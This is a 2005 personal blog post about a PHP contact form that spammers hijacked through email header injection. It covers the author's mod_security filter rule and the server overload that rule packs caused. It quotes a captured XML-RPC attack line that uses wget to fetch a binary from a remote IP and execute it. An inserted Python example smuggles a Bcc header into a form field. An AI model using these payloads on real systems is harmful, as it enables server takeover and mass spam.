Canned Spam

Posted In: Technology — December 23, 2005 @ 9:17 pm — Peter

We’ve been bitten by a spammer who maliciously used our contact page to send roughly 1000 email messages trying to sell software.

I suspected something was up when I received email messages containing MIME headers in the message body, but I brushed it off, assuming I was protected because the “TO:” value is hard coded in the PHP script.

Shortly after, nicely formatted messages started rolling in that were hawking cheap software and were seemingly originating from our server. After inspecting the headers of one of the messages, I realized the contact page was being exploited and quickly locked it down using chmod.

After a bit of research, I see how the form was being exploited. The PHP mail() function simply inserts whatever text is passed to it, unchecked, into the respective part of the email message. The spammer was packing the message body with MIME content that allowed for the specification of “BCC:” values. Oops, I really should have validated this input before passing it along to PHP mail(). Here is a great article explaining the risks involved with using PHP mail() and other form mail processing technologies:

http://securephp.damonkohler.com/index.php/Email_Injection

I was tempted to wrap the form fields of the contact page with some regex to rid us of the annoying spammer, but that didn’t seem like a good solution. The article above mentioned a module for Apache web server called mod_security that acts as an application firewall preventing malformed data from reaching scripts and applications. After a bit more reading, I determined this module was right up my alley. I quickly installed it and devised the following rule to protect the contact page from MIME header injection:

SecFilterSelective "POST_PAYLOAD" ".*(content-disposition|to|cc|bcc|from|content-type|mime-version|content-transfer-encoding|subject)[[:space:]]*\:.*"
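As an added example (not the post's own code), the rule above re-implemented in Python beside the per-field line-break check that the contact script should have done before calling mail(). It assumes, as mod_security does when it normalizes requests, that the pattern is matched against the URL-decoded POST body; the form field names and sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Re-implementation of the post's SecFilterSelective pattern: the POSIX class
# [[:space:]] becomes \s, the leading/trailing .* are dropped because search()
# is unanchored, and matching is case-insensitive (assumption).
HEADER_RULE = re.compile(
    r"(content-disposition|to|cc|bcc|from|content-type|mime-version"
    r"|content-transfer-encoding|subject)\s*:",
    re.IGNORECASE,
)


def rule_matches(post_payload: str) -> bool:
    """True if the URL-decoded form body trips the header-injection rule."""
    return HEADER_RULE.search(unquote_plus(post_payload)) is not None


def has_line_break(field_value: str) -> bool:
    """Field-level check a mail() wrapper needs: a value destined for a header
    (From, Subject, ...) must not contain CR or LF, because a line break is
    what lets a submitted value start a new header such as Bcc:."""
    return "\r" in field_value or "\n" in field_value


def check_contact_form(post_payload: str) -> dict:
    """Parse a urlencoded contact-form body and report both checks.
    Assumed field names: email and subject feed mail() headers."""
    parsed = parse_qs(post_payload, keep_blank_values=True)
    fields = {key: values[0] for key, values in parsed.items()}
    return {
        "rule_hit": rule_matches(post_payload),
        "crlf_in_headers": any(
            has_line_break(fields.get(name, "")) for name in ("email", "subject")
        ),
    }


# Constructed sample bodies, not real traffic.
LEGIT = "email=alice%40example.com&subject=Question&message=Hello+there"
# %0A is a newline: the email field smuggles a second header line.
INJECTED = (
    "email=alice%40example.com%0ABcc%3A+victim1%40example.net%2Cvictim2%40example.net"
    "&subject=Question&message=Hi"
)
# Harmless text that still trips the broad pattern, since "to" followed by a
# colon matches anywhere in the body; the CRLF check does not fire on it.
FALSE_POSITIVE = "email=bob%40example.com&subject=Hi&message=Note+to%3A+staff"
```

The third sample shows why the mod_security rule is a coarse first line of defense: the narrower line-break check on header-bound fields catches the injection without rejecting ordinary prose.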

After doing some more research, I found a wonderful community of support sharing rules to thwart the hacking efforts of spammers and script kiddies. I’ve loaded a few rule bundles from http://gotroot.com/ and am pleased with the results. For example, this nasty hack attempt was caught shortly after loading the extensive rule sets:

<?xml version="1.0"?>test.method ',"));echo '_begin_';echo `cd /tmp;wget 209.136.48.69/mirela;chmod +x mirela;./mirela `;echo '_end_';exit;/*

Of course this added security comes with quite a price tag in terms of CPU resources. Actually, the full package of rules from http://gotroot.com/ caused our server to seize up due to lack of free memory… It makes sense, since each request must be aggressively inspected and compared against a massive rule base to determine whether it is legitimate traffic.

Dec 23 18:47:16 eudora kernel: Free swap = 0kB
Dec 23 18:47:16 eudora kernel: Total swap = 522072kB
Dec 23 18:47:18 eudora kernel: Out of Memory: Killed process 11935 (httpd).

These log entries are from a postmortem analysis after our server became so overloaded that it would not respond to any sort of network connection. Perhaps I’ll resize the swap file, but I’d prefer to get a server with more RAM and CPU resources… Anyone want to donate some hardware to our lovely website? I’m hoping this server is still available for sale…

For the time being, I’ve trimmed the mod_security ruleset down to what I see as the most important lines of defense. Already our site seems to be more responsive, and hopefully it will remain safe against spammers and script kiddies.

2 Responses to “Canned Spam”

  1. Mom Moty Says:

    Hi Pete, Stephanie & Amelia,

    Merry Christmas!

    Love
    Mom & Dad

  2. Mike Says:

    The mod_security load problems might have also been caused by the version of Apache you might be running. Apache 1.x had serious problems with mod_security until 1.9.2 came out. 1.9.2 included support for the external PCRE library, as the internal regexp engine in Apache 1.x was terrifyingly slow and resource intensive. The amount of resources it consumed would increase exponentially as a function of the length of the URI.

    Anyway, thought it might be helpful. 1.9.2 might solve your problem with load/memory.
